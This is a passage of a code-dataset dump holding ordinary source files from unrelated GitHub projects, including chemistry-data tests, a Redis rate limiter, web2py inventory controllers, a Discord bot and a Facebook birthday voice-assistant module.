MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n ],\n)\ndef test_fetch(cdd_header, moonshot_vault, search, cdd_col_headers):\n \"\"\"\n 
Test fetching each saved search.\n    \"\"\"\n    url = f\"{CDD_URL}/{moonshot_vault}/searches/{search}\"\n    response = download_url(url, cdd_header, vault=moonshot_vault)\n    assert response.ok\n\n    # Check that the correct data was downloaded\n    # different numbers of molecules depending on when the download occurred, so just\n    # check the column header\n    content = response.content.decode()\n    lines = content.split(\"\\n\")\n    assert lines[0] == \",\".join(cdd_col_headers[search])\n\n\n@pytest.mark.parametrize(\"retain_achiral\", [True, False])\n@pytest.mark.parametrize(\"retain_racemic\", [True, False])\n@pytest.mark.parametrize(\"retain_enantiopure\", [True, False])\n@pytest.mark.parametrize(\"retain_semiquantitative_data\", [True, False])\ndef test_filter_df(\n    retain_achiral,\n    retain_racemic,\n    retain_enantiopure,\n    retain_semiquantitative_data,\n    filter_df_files,\n):\n    import pandas\n    from asapdiscovery.data.utils import filter_molecules_dataframe\n\n    in_fn, all_out_fns = filter_df_files\n    flags = (\n        retain_achiral,\n        retain_racemic,\n        retain_enantiopure,\n        retain_semiquantitative_data,\n    )\n    out_fn = all_out_fns[flags]\n\n    in_df = pandas.read_csv(in_fn)\n    out_df = pandas.read_csv(out_fn)\n\n    in_df_filtered = filter_molecules_dataframe(\n        in_df,\n        retain_achiral=retain_achiral,\n        retain_racemic=retain_racemic,\n        retain_enantiopure=retain_enantiopure,\n        retain_semiquantitative_data=retain_semiquantitative_data,\n    )\n\n    assert in_df_filtered.shape[0] == out_df.shape[0]\n    assert (\n        in_df_filtered[\"name\"].values == out_df[\"Canonical PostEra ID\"].values\n    ).all()\n\n\n@pytest.mark.parametrize(\"keep_best\", [True, False])\n@pytest.mark.parametrize(\"cp_values\", [None, [0.375, 9.5]])\ndef test_parse_fluorescence(keep_best, cp_values, parse_df_files):\n    import pandas\n    from asapdiscovery.data.utils import parse_fluorescence_data_cdd\n\n    in_fn, all_out_fns = parse_df_files\n    flags = (keep_best, bool(cp_values))\n    out_fn = all_out_fns[flags]\n\n    in_df = pandas.read_csv(in_fn)\n    out_df = pandas.read_csv(out_fn)\n\n    in_df_parsed = parse_fluorescence_data_cdd(\n        in_df, keep_best_per_mol=keep_best, cp_values=cp_values\n    )\n\n    # Check that range values were assigned correctly\n    assert (in_df_parsed[\"pIC50_range\"] == out_df[\"pIC50_range\"]).all()\n\n    # Columns with float vals to compare\n    float_check_cols = [\n        \"IC50 (M)\",\n        \"IC50_stderr (M)\",\n        \"IC50_95ci_lower (M)\",\n        \"IC50_95ci_upper (M)\",\n        \"pIC50\",\n        \"pIC50_stderr\",\n        \"pIC50_95ci_lower\",\n        \"pIC50_95ci_upper\",\n        \"exp_binding_affinity_kcal_mol\",\n        \"exp_binding_affinity_kcal_mol_95ci_lower\",\n        \"exp_binding_affinity_kcal_mol_95ci_upper\",\n        \"exp_binding_affinity_kcal_mol_stderr\",\n    ]\n    for c in float_check_cols:\n        assert_allclose(\n            in_df_parsed[c].values,\n            out_df[c].values,\n            rtol=1e-05,\n            atol=1e-08,\n            equal_nan=True,\n            err_msg=f\"{c} cols not equal\",\n        )\n\n\n@pytest.mark.xfail\n@pytest.mark.parametrize(\n    \"search\",\n    [\n        MOONSHOT_ALL_SMI_SEARCH,\n        MOONSHOT_NONCOVALENT_SMI_SEARCH,\n        MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n    ],\n)\ndef test_download_molecules(\n    cdd_header,\n    moonshot_vault,\n    search,\n    cdd_col_headers,\n    moonshot_saved_searches,\n    tmp_path,\n):\n    from hashlib import sha256\n\n    import pandas\n\n    # Download and check\n    fn_out = tmp_path / \"out.csv\"\n    fn_cache = tmp_path / \"cache.csv\"\n    df = download_molecules(\n        cdd_header,\n        vault=moonshot_vault,\n        search=search,\n        fn_out=fn_out,\n        fn_cache=fn_cache,\n    )\n\n    # Extra columns will be added\n    target_cols = 
cdd_col_headers[search] + FILTER_ADDED_COLS + PARSE_ADDED_COLS\n assert sorted(df.columns.tolist()) == sorted(target_cols)\n\n df_loaded = pandas.read_csv(fn_out)\n assert sorted(df_loaded.columns.tolist()) == sorted(target_cols)\n\n assert (\n sha256(fn_cache.open(\"rb\").read()).hexdigest()\n == moonshot_saved_searches[1][search]\n )\n\n\n@pytest.mark.xfail\n@pytest.mark.parametrize(\n \"search\",\n [\n MOONSHOT_ALL_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_SMI_SEARCH,\n MOONSHOT_NONCOVALENT_W_DATES_SEARCH,\n ],\n)\ndef test_download_molecules_cache(\n cdd_header, moonshot_vault, search, cdd_col_headers, moonshot_saved_searches\n):\n # First download file\n saved_fn = moonshot_saved_searches[0] / search\n\n # Search will only be run if loading from cache fails\n df = download_molecules(\n cdd_header,\n vault=moonshot_vault,\n search=\"non_existent_search\",\n fn_cache=saved_fn,\n )\n target_cols = cdd_col_headers[search] + FILTER_ADDED_COLS + PARSE_ADDED_COLS\n assert sorted(df.columns.tolist()) == sorted(target_cols)\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-data/asapdiscovery/data/tests/test_moonshot.py","file_name":"test_moonshot.py","file_ext":"py","file_size_in_byte":11668,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"6908822476","text":"import functools\nimport logging\nfrom datetime import timedelta\n\nfrom pyrogram.client import Client\nfrom pyrogram.types import Message\nfrom bot.redisc import rd\n\nLIMIT = 7\nEXPIRE = timedelta(seconds=30)\n\n\ndef ratelimited(limit=LIMIT, expires=EXPIRE):\n def decorator(func):\n @functools.wraps(func)\n async def run(_c: Client, _m: Message, *args, **kwargs):\n r = await rd.incr(_m.chat.id)\n if r == 1:\n await rd.expire(_m.chat.id, time=expires)\n if r > limit:\n ttl = await rd.ttl(_m.chat.id)\n logging.debug(f\"request times {r} exceed for user {_m.chat.id}\")\n await _m.reply(f\"Too many requests within {expires.seconds} seconds, wait {ttl} seconds\")\n return\n logging.debug(f\"request times {r} for user {_m.chat.id}\")\n await func(_c, _m, *args, **kwargs)\n return run\n return decorator\n\n\n","repo_name":"animeshxd/brcbot","sub_path":"bot/decorators/redis_rate_limiter.py","file_name":"redis_rate_limiter.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10252694289","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCollect and Interp data\nClean version w/o file path\n\nChristopher Liu\n8/16/2020\n\"\"\"\n\nimport numpy as np\nimport os\nfrom scipy.interpolate import interp1d\n\ndef extract():\n rnums = range(0,1300)\n gaugenos = [702,712,901,902,911,912]\n \n for rnum in rnums:\n outdir = '/XXX/run_%s/_output' % str(rnum).zfill(6)\n homepath = 'gauge_data/run_%s' % str(rnum).zfill(6)\n \n if not os.path.isdir(homepath):\n os.mkdir(homepath)\n \n for gaugeno in gaugenos:\n gfile = '%s/gauge%s.txt' % (outdir, str(gaugeno).zfill(5))\n gdata = np.loadtxt(gfile)\n t = gdata[:,1] # seconds\n eta = gdata[:,5] # surface elevation in meters\n \n eta_unif, tt = unif_data(eta,t,10)\n saveloc = '%s/gauge%s.txt' % (homepath, str(gaugeno).zfill(5))\n np.savetxt(saveloc, np.vstack((tt,eta_unif)).T, delimiter=',', header=\"t, eta\")\n \n# interpolate to uniform time grid for a given sample time\ndef unif_data(eta,t,sample_time):\n tt = np.arange(0., t[-1], sample_time)\n\n gaugefcn = interp1d(t, eta, kind='linear', bounds_error=False)\n eta_unif = gaugefcn(tt)\n \n return 
eta_unif, tt\n\ndef main():\n if not os.path.isdir('gauge_data'):\n os.mkdir('gauge_data')\n extract()\nmain()\n\n\n\n\n","repo_name":"chrismhl/tsunami","sub_path":"interp_clean.py","file_name":"interp_clean.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9989606797","text":"import torch\nimport argparse\n\nfrom rei.rei import REI\n\nfrom dataset.cvdb import CVDB_CVPR\nfrom physics.inpainting import Inpainting\nfrom transforms.shift import Shift\n\n\n\nparser = argparse.ArgumentParser(description='REI')\n# inverse problem configs:\nparser.add_argument('--task', default='inpainting', type=str,\n help=\"inverse problems=['ct', 'inpainting', 'mri'] (default: 'inpainting')\")\n\ndef main(cuda=0, gamma=0.01):\n args = parser.parse_args()\n\n device=f'cuda:{cuda}'\n\n pretrained = None\n lr_cos = False\n save_ckp = True\n report_psnr = True\n\n\n mask_rate = 0.3\n tau = 1e-2\n epochs = 500\n ckp_interval = 100\n schedule = [100, 200, 300, 400]\n batch_size = 1\n lr = {'G': 1e-4, 'WD': 1e-8}\n alpha = {'req': 1, 'sure': 1}\n\n noise_model = {'noise_type':'p',\n 'sigma':0,\n 'gamma':gamma}\n\n dataloader = CVDB_CVPR(dataset_name='Urban100', mode='train', batch_size=batch_size,\n shuffle=True, crop_size=(512, 512), resize=True)\n\n transform = Shift(n_trans=3)\n\n physics = Inpainting(img_heigth=256, img_width=256,\n mask_rate=mask_rate, device=device, noise_model=noise_model)\n\n rei = REI(in_channels=3, out_channels=3, img_width=256, img_height=256,\n dtype=torch.float, device=device)\n\n rei.train_rei(dataloader, physics, transform, epochs, lr, alpha, ckp_interval,\n schedule, pretrained, lr_cos, save_ckp, tau, report_psnr, args)\n\n\n\nif __name__ == '__main__':\n main(cuda=0, gamma=0.01)\n main(cuda=0, gamma=0.05)\n main(cuda=0, gamma=0.1)","repo_name":"edongdongchen/REI","sub_path":"demo_scripts/demo_inpainting.py","file_name":"demo_inpainting.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"53"} +{"seq_id":"42933229901","text":"def inventory():\n user = auth.user\n comp = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n fields = (db.item.id, db.item.Name, db.item.Worth, db.item.Category, db.item.Status)\n headers = {'item.id': 'ID',\n 'item.Name': 'Name',\n 'item.Worth': 'Value (EUR)',\n 'item.Category': 'Category',\n 'item.Status': 'Status'}\n default_sort_order = [db.item.Name]\n form = SQLFORM.grid(db.item.company_id == comp.id, create=False, fields=fields, headers=headers,\n orderby=default_sort_order, maxtextlength=64, paginate=25,\n editable=True, deletable=auth.has_membership('ROLE_ADMIN'))\n return dict(user=user, company=comp, form=form, membership=membership)\n\n\ndef inventoryInUse():\n user = auth.user\n comp = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n rows = db((db.item.Status == 'Taken')&(db.item.company_id == comp.id)).select()\n return dict(user=user, company=comp, rows=rows, membership=membership)\n\n\ndef addItem():\n form=SQLFORM(db.item)\n user = auth.user\n comp = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n if form.process().accepted:\n new_item = db(db.item).select().last()\n db(db.item.id == new_item.id).update(company_id=comp.id)\n if new_item.Status == 'Taken':\n db(db.item.id == new_item.id).update(Taken=1)\n 
return dict(form=form, user=user, company=comp, membership=membership)\n\n\ndef removeItem():\n user = auth.user\n comp = get_user_company(user)\n\n return dict(user=user, company=comp)\n\n\ndef add_category():\n user = auth.user\n company = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n form = SQLFORM(db.category).process()\n return locals()\n\n\ndef edit_item():\n user = auth.user\n company = get_user_company(user)\n membership = db(db.auth_membership.user_id == user.id).select().first()\n item = db.item(request.args(0, cast=int))\n form = SQLFORM(db.item, item)\n if form.process().accepted:\n if item.Status == 'Taken':\n new_count = int(float(item.Taken)) + 1\n db(db.item.id == item.id).update(Taken=new_count)\n return locals()\n\n\n@auth.requires_login()\ndef get_user_company(user):\n company = db(user.company_id == db.company.id).select().first()\n return company\n","repo_name":"daiarn/IMS","sub_path":"web2py/applications/InventoryManagement/controllers/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72429494249","text":"import sys\n\ndef rucksack_from_string(s):\n rucksack = s.rstrip()\n split_point = len(rucksack) // 2\n return (set(rucksack[:split_point]), set(rucksack[split_point:]))\n\ndef item_priority(item):\n if item >= 'a' and item <= 'z':\n return ord(item) - ord('a') + 1\n elif item >= 'A' and item <= 'Z':\n return ord(item) - ord('A') + 27\n else:\n return 0\n\ndef solve(file):\n priority_sum = 0\n for line in file:\n rucksack = rucksack_from_string(line)\n common = rucksack[0].intersection(rucksack[1])\n priority_sum += sum(map(item_priority, common))\n return priority_sum\n\ndef main():\n solution = solve(sys.stdin)\n print(solution)\n\nif __name__ == '__main__':\n main()\n","repo_name":"BinaryAlien/Advent-of-Code","sub_path":"2022/03/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71451281768","text":"from create_test_data import Tournament, Match, Player, compute_rank_scores\nfrom calculatePairwiseSeries import NUM_ITEMS\nimport random\nimport numpy as np\n\n# can fill this in manually if changes from calculatePairwiseSeries.py\n#NUM_ITEMS = 6\n\nif __name__ == \"__main__\":\n\tdata = []\n\twith open(\"generated_output.txt\", 'r') as filename:\n\t\tfor line in filename:\n\t\t\tdata.append(eval(line))\n\t\n\tplayers= [Player(str(i), i) for i in range(NUM_ITEMS)]\n\n\tmatches= []\n\tfor p in data:\n\t\tfor item in p:\n\t\t\t# pick 0 or 1\n\t\t\tindex = random.choice([0,1])\n\t\t\twinner = item[index]\n\t\t\t# flip bit with ^\n\t\t\tloser = item[index ^ 1]\n\t\t\tm = Match(players[winner], players[loser], index)\n\t\t\tmatches.append(m)\n\t\t\t\n\tt = Tournament(players, matches)\n\t\n\tfor p in t.players:\n\t\tp.wins=\t len(t.getMatchesWithWin(p))\n\t\tothers= [pprime for pprime in t.players if pprime != p]\n\t\tp.perOpponent(others, t)\n\t\t\n\tcompute_rank_scores(t)\n\t\n\t#print(players)\n\twith open('testing_video_ranks.txt', 'w') as filename:\n\t\tfor p in 
t.players:\n\t\t\tfilename.write(p.name)\n\t\t\tfilename.write(\"\\t\")\n\t\t\tfilename.write(str(p.probability))\n\t\t\tfilename.write(\"\\n\")","repo_name":"drwiner/SimpleBradleyTerry","sub_path":"random_pairwise_series.py","file_name":"random_pairwise_series.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19578851552","text":"\"\"\"Handlers collection of server model endpoints.\"\"\"\n\nfrom flask import jsonify, request\n\nfrom app.models import Server\nfrom app.utils import paginate_response\n\n\ndef get_servers():\n \"\"\"Retrieve all existing servers from database.\"\"\"\n page = request.args.get('page', 1, type=int)\n order_by = request.args.get('order_by')\n servers = Server.get_all(order_by=order_by)\n\n response = paginate_response(servers, page)\n return jsonify(response), 200\n\n\ndef create_server():\n \"\"\"Create new server instance.\"\"\"\n json_data = request.get_json()\n if not json_data:\n return jsonify({'error': 'No required input data provided.'}), 400\n\n data, errors = Server.from_dict(json_data)\n if errors:\n return jsonify(errors), 400\n\n server = Server.get(data.get('endpoint'))\n if server:\n return jsonify({'error': 'Server with this endpoint already exists.'}), 400\n\n # Create a new server instance\n server = Server(data)\n\n response = server.to_dict()\n return jsonify(response), 201\n\n\ndef get_server(endpoint):\n \"\"\"Retrieve single server instance from database.\"\"\"\n server = Server.get_server_stats(endpoint)\n if server is None:\n return jsonify({'message': 'Server instance could not be found.'}), 404\n\n response = server.to_dict()\n return jsonify(response), 200\n\n\ndef update_server(endpoint):\n \"\"\"Update server instance in database.\"\"\"\n server = Server.get(endpoint)\n if server is None:\n return jsonify({'message': 'Server instance could not be found.'}), 404\n\n # Update server instance\n json_data = request.get_json()\n server.update(json_data.get('title'))\n\n response = server.to_dict()\n return jsonify(response), 200\n","repo_name":"PetrushynskyiOleksii/shooter-stats","sub_path":"src/app/views/servers.py","file_name":"servers.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9715221464","text":"import pytest\nimport datetime\nfrom unittest.mock import patch\n\nfrom sqlalchemy import String\nfrom sqlalchemy.orm import declarative_base\n\nfrom pyramid_oereb.contrib.data_sources.standard.models import get_office, get_document\nfrom pyramid_oereb.contrib.data_sources.standard.sources.document import DatabaseSource\nfrom pyramid_oereb.core.records.documents import DocumentRecord\nfrom pyramid_oereb.core.records.office import OfficeRecord\nfrom pyramid_oereb.core.records.document_types import DocumentTypeRecord\nfrom pyramid_oereb.core.records.law_status import LawStatusRecord\n\n\n@pytest.fixture\ndef document_source_params(db_connection):\n yield {\n \"db_connection\": db_connection,\n \"model\": \"pyramid_oereb.contrib.data_sources.standard.models.main.Document\"\n }\n\n\n@pytest.fixture\ndef office_records():\n yield [\n OfficeRecord(\n {'de': 'Test1'},\n office_at_web={'de': 'www.example1.com'},\n uid='ch99',\n postal_code=4123,\n identifier=1\n ),\n OfficeRecord(\n {'de': 'Test2'},\n office_at_web={'de': 'www.example2.com'},\n uid='ch100',\n postal_code=4321,\n identifier=2\n )\n ]\n\n\n@pytest.fixture\ndef 
document():\n Base = declarative_base()\n Office = get_office(Base, 'test', String)\n Document = get_document(Base, 'test', String, Office)\n yield Document\n\n\n@pytest.fixture\ndef date_today():\n yield datetime.date.today()\n\n\n@pytest.fixture\ndef all_document_result_session(session, query, document, date_today, png_binary):\n class Query(query):\n def all(self):\n return [\n document(**{\n 'id': 1,\n 'document_type': 'Hinweis',\n 'index': 1,\n 'law_status': 'inKraft',\n 'title': {'de': 'Titel1'},\n 'office_id': 1,\n 'published_from': date_today - datetime.timedelta(days=5),\n 'published_until': date_today + datetime.timedelta(days=5),\n 'text_at_web': {'de': 'https://test1.abcd'},\n 'abbreviation': {'de': 'abkrz'},\n 'official_number': {'de': 'ch.abc.d123'},\n 'file': png_binary\n }),\n document(**{\n 'id': 2,\n 'document_type': 'Gesetz',\n 'index': 2,\n 'law_status': 'inKraft',\n 'title': {'de': 'Titel2'},\n 'office_id': 1,\n 'published_from': date_today - datetime.timedelta(days=5),\n 'published_until': date_today + datetime.timedelta(days=5),\n 'text_at_web': {'de': 'https://test2.abcd'},\n 'abbreviation': {'de': 'abkrz'},\n 'official_number': {'de': 'ch.abc.d321'},\n 'file': png_binary\n })\n ]\n\n class Session(session):\n\n def query(self, term):\n return Query()\n\n yield Session\n\n\n@pytest.fixture(autouse=True)\ndef mock_config_get_main_document_type_by_data_code(app_config):\n def mock_get_main_document_type_by_data_code(doc_type):\n if doc_type == 'Hinweis':\n return DocumentTypeRecord('Hinweis', {'de': 'Hinweis'})\n if doc_type == 'Gesetz':\n return DocumentTypeRecord('Gesetz', {'de': 'Gesetz'})\n\n with patch(\n 'pyramid_oereb.core.config.Config.get_main_document_type_by_data_code',\n mock_get_main_document_type_by_data_code):\n yield\n\n\n@pytest.fixture(autouse=True)\ndef mock_config_get_main_law_status_by_data_code(app_config):\n def mock_get_main_law_status_by_data_code(law_status):\n return LawStatusRecord('inKraft', {'de': 'In Kraft'})\n\n with patch(\n 'pyramid_oereb.core.config.Config.get_main_law_status_by_data_code',\n mock_get_main_law_status_by_data_code):\n yield\n\n\ndef test_read_all(document_source_params, all_document_result_session, office_records, png_binary, date_today): # noqa: E501\n source = DatabaseSource(**document_source_params)\n with patch('pyramid_oereb.core.adapter.DatabaseAdapter.get_session', return_value=all_document_result_session()): # noqa: E501\n source.read(office_records)\n assert len(source.records) == 2\n assert isinstance(source.records[0], DocumentRecord)\n assert isinstance(source.records[1], DocumentRecord)\n test_document = source.records[0]\n assert test_document.identifier == 1\n assert isinstance(test_document.document_type, DocumentTypeRecord)\n assert test_document.index == 1\n assert isinstance(test_document.law_status, LawStatusRecord)\n assert test_document.title == {'de': 'Titel1'}\n assert isinstance(test_document.responsible_office, OfficeRecord)\n assert test_document.published_from == date_today - datetime.timedelta(days=5)\n assert test_document.published_until == date_today + datetime.timedelta(days=5)\n assert test_document.published\n assert test_document.text_at_web == {'de': 'https://test1.abcd'}\n assert test_document.abbreviation == {'de': 'abkrz'}\n assert test_document.official_number == {'de': 'ch.abc.d123'}\n assert test_document.file == 
png_binary\n","repo_name":"openoereb/pyramid_oereb","sub_path":"tests/contrib.data_sources.standard/sources/test_document.py","file_name":"test_document.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"23081304176","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport grpc\nimport data_pb2, data_pb2_grpc\nimport memory_profiler\nimport psutil\n_HOST = '10.10.94.53'\n_PORT = '8765'\n\n@memory_profiler.profile\ndef run(country,city,map_info=None,province=None):\n if not province:\n #print ('asd')\n if map_info:\n text = country + '&' + city + '&' + map_info\n else:\n text = country + '&' + city\n else:\n if map_info:\n text = country + '&' + city + '&' + map_info + '~' + province\n #print (text)\n else:\n text = country + '&' + city + '~' + province\n #print('a',text)\n conn = grpc.insecure_channel(_HOST + ':' + _PORT)\n client = data_pb2_grpc.FormatDataStub(channel=conn)\n response = client.DoFormat(data_pb2.Data(text=text))\n print(\"received: \" + response.text)\n return response.text\n\n\nif __name__ == '__main__':\n for i in range(10):\n run('Jordan', 'Wadi Musa','35.4832992553711,30.3166999816895')\n run('意大利', '塔兰托(省)')\n run('约旦', '安曼 (及邻近地区)')\n run('日本', '大阪县') # \"2.35147638246417,48.8566821749061\")[0].cid)\n run('中国', '达县县')\n for map in [\"115.041500091553,-8.45612507720947\", \"115.210892,-8.273642\", \"115.222,-8.656\", \"115.22156,-8.65667\",\"115.111241,-8.380058\", \"115.188916,-8.409518\"]:\n run('印度尼西亚', '巴厘岛',map)\n run('中国', '马祖')\n run('美国', 'Wilmington','-77.9447102,34.2257255',province='p501027')\n run('美国', 'Wilmington', '-77.9447102,34.2257255', province='p501029')\n run('Jordan', 'Wadi Musa')\n run('日本','别府',province='p121008')","repo_name":"20113261/platform_service","sub_path":"Common/CityMapClient.py","file_name":"CityMapClient.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19476341067","text":"# -*- coding: utf-8-*-\nimport datetime\nimport re\nimport facebook\nfrom client.app_utils import getTimezone\n\nWORDS = [\"ANNIVERSAIRE\"]\n\n\ndef handle(text, mic, profile):\n \"\"\"\n Responds to user-input, typically speech text, by listing the user's\n Facebook friends with birthdays today.\n\n Arguments:\n text -- user-input, typically transcribed speech\n mic -- used to interact with the user (for both input and output)\n profile -- contains information related to the user (e.g., phone\n number)\n \"\"\"\n oauth_access_token = profile['keys'][\"FB_TOKEN\"]\n\n graph = facebook.GraphAPI(oauth_access_token)\n\n try:\n results = graph.request(\"me/friends\",\n args={'fields': 'id,name,birthday'})\n except facebook.GraphAPIError:\n mic.say(\"Je n'es pas été autorisée à avoir accès à votre compte Facebook.\" +\n \"Si vous voulez me donner l'accès, merci de consulter la documentation sur GitHub.\")\n return\n except:\n mic.say(\n \"Veuillez m'excuser, il y a actuellement un problème avec ce service.\")\n return\n\n needle = datetime.datetime.now(tz=getTimezone(profile)).strftime(\"%m/%d\")\n\n people = []\n for person in results['data']:\n try:\n if needle in person['birthday']:\n people.append(person['name'])\n except:\n continue\n\n if len(people) > 0:\n if len(people) == 1:\n output = people[0] + \" a un anniversaire aujourd'hui.\"\n else:\n output = \"Vos amis fêtant leur anniversaire aujourd'hui sont \" + \\\n \", \".join(people[:-1]) + \" 
et \" + people[-1] + \".\"\n else:\n output = \"Aucun de vos amis fêtes son anniversaire aujourd'hui.\"\n\n mic.say(output)\n\n\ndef isValid(text):\n \"\"\"\n Returns True if the input is related to birthdays.\n\n Arguments:\n text -- user-input, typically transcribed speech\n \"\"\"\n return bool(re.search(r'anniversaire', text, re.IGNORECASE))\n","repo_name":"mwellck/shella-client","sub_path":"client/modules/fr/FBirthday.py","file_name":"FBirthday.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10752307983","text":"import discord\nfrom discord.ext import commands\nimport traceback\n\nimport datetime\nimport pytz\n\nimport asyncio\nimport psutil\n\nimport configparser\nconfig = configparser.ConfigParser()\n\n# 環境変数は .env から読み込む\nfrom dotenv import load_dotenv\nload_dotenv()\n\nINITIAL_COGS = [\n 'cogs.mainCog',\n 'cogs.chatGPTCog'\n]\n\n# 設定読み込み\nconfig.read('config/config.ini')\nOWNER_ID = int(config['DISCORD']['owner_id']) # DM 送信先のID\n\n\n# 起動時DMのID格納用\nDM_ID = None\n\n# JST に変換\ndef jst(utc_time):\n # タイムゾーンを JST に指定\n jst_timezone = pytz.timezone('Asia/Tokyo')\n \n # JST に変換\n utc = pytz.timezone('UTC')\n utc_time = utc.localize(utc_time) # UTC付与\n jst_time = utc_time.astimezone(jst_timezone)\n \n return jst_time\n\n# BOT の起動時刻を取得\nstart_time = jst(datetime.datetime.utcnow())\n\n# BOT のかどう時間を取得\nasync def get_uptime():\n # 現在の時刻を取得\n current_time = jst(datetime.datetime.utcnow())\n # 稼働時間を計算\n uptime = current_time - start_time\n # 稼働時間を整形\n uptime_hours = uptime.total_seconds() / 3600\n\n return uptime_hours\n\n# DM 用メッセージを生成\nasync def generate_dm_message():\n # BOTの起動時間、累計稼働時間、最後のハートビート時刻を取得\n uptime_hours = await get_uptime()\n heartbeat_time = jst(datetime.datetime.utcnow()).strftime('%Y/%m/%d %H:%M:%S')\n\n # ついでに招待リンクも生成\n invite_link = discord.utils.oauth_url(\n bot.user.id,\n permissions=discord.Permissions(administrator=True),\n scopes=(\"bot\", \"applications.commands\")\n )\n\n # メッセージのテンプレート\n message_template = f\"-----------------------------------------------\\n\" \\\n f\"**Wakeup Datetime:** {start_time.strftime('%Y/%m/%d %H:%M:%S')}\\n\" \\\n f\"**Last Heartbeat:** {heartbeat_time}\\n\" \\\n f\"**Uptime:** {uptime_hours:.2f}h\\n\" \\\n f\"-----------------------------------------------\\n\" \\\n f\"[**Bot Invite Link**]({invite_link})\\n\" \\\n f\"-----------------------------------------------\"\n return message_template\n\n# DM 送信\nasync def send_dm(bot):\n global MESSAGE_ID # グローバル変数の使用を宣言\n owner = await bot.fetch_user(OWNER_ID)\n message = await owner.send(await generate_dm_message())\n MESSAGE_ID = message.id # 送信したメッセージのIDを格納\n\n# DM 編集\nasync def edit_dm(bot):\n global MESSAGE_ID # グローバル変数の使用���宣言\n owner = await bot.fetch_user(OWNER_ID)\n while True:\n try:\n dm = await owner.create_dm()\n message = await dm.fetch_message(MESSAGE_ID)\n await message.edit(content=await generate_dm_message())\n\n # ついでに presence も更新\n await set_presence_uptime()\n \n except Exception as e:\n print(f\"Error editing DM message: {e}\")\n\n await asyncio.sleep(900) # 15分ごとに編集を試行\n\n# メモリ使用率取得\ndef get_status_memusage() -> str:\n mem_usage = psutil.virtual_memory().percent\n return f\"MEM USAGE: {mem_usage}% \"\n# サーバー PING 計測\ndef get_status_ping() -> str:\n ping = round(bot.latency * 1000) # Botのサーバーとのpingをミリ秒単位で取得し、小数点以下を四捨五入\n return f\"PING: {ping}ms \"\n# BOT 稼働時間取得\nasync def get_status_uptime() -> str:\n uptime = await get_uptime()\n return f\"UPTIME: {uptime:.2f}h 
\"\n\n# bot presence を UPTIME に設定する\nasync def set_presence_uptime():\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=await get_status_uptime()))\n\n# presense 更新\nasync def status_task():\n while True:\n # 各種ステータスを取得する\n activity_list = [\n get_status_memusage(),\n get_status_ping(),\n await get_status_uptime(),\n ]\n\n for get_status in activity_list:\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=get_status))\n await asyncio.sleep(20)\n\n# メインクラス\nclass MyBot(commands.Bot):\n # コンストラクタ\n def __init__(self, command_prefix):\n # インテントの生成\n intents = discord.Intents.all()\n intents.message_content = True\n\n # スーパークラスのコンストラクタに値を渡して実行\n super().__init__(command_prefix, intents=intents, help_command=None)\n\n # 終了処理\n async def shutdown(bot):\n await bot.close()\n\n # すべての cog をリロードする\n async def reload_extensions(self):\n # Cog を読み込み\n for cog in INITIAL_COGS:\n try:\n await bot.reload_extension(cog)\n except Exception:\n traceback.print_exc()\n await bot.tree.sync()\n\n # Bot の準備完了時\n async def on_ready(self):\n for cog in INITIAL_COGS:\n try:\n await bot.load_extension(cog)\n except Exception:\n traceback.print_exc()\n\n await bot.tree.sync()\n await bot.change_presence(activity=discord.Game(name=\"initialized.\"))\n\n print('-----')\n print(self.user.name)\n print(self.user.id)\n print('-----')\n\n # オーナーに DM を送信\n await send_dm(bot)\n bot.loop.create_task(edit_dm(bot))\n\n# 実行\nif __name__ == '__main__':\n bot = MyBot(command_prefix=config['DISCORD']['prefix'])\n bot.run(config['DISCORD']['token'])","repo_name":"twelvehouse/discord-NAVI","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5764,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39606816257","text":"import pandas as pd\nimport openpyxl\nimport numpy as np\nfrom openpyxl.utils.cell import get_column_letter\nfrom openpyxl.styles import PatternFill, Font\n\ndef get_available_metrics(dataframes):\n metrics = set()\n for df in dataframes:\n # This print statement is for debugging purposes\n print(f\"Currently processing: {df}, Type: {type(df)}\")\n # Ensure that df is a pandas DataFrame or Series\n if isinstance(df, (pd.DataFrame, pd.Series)):\n metrics.update(df.index.tolist())\n 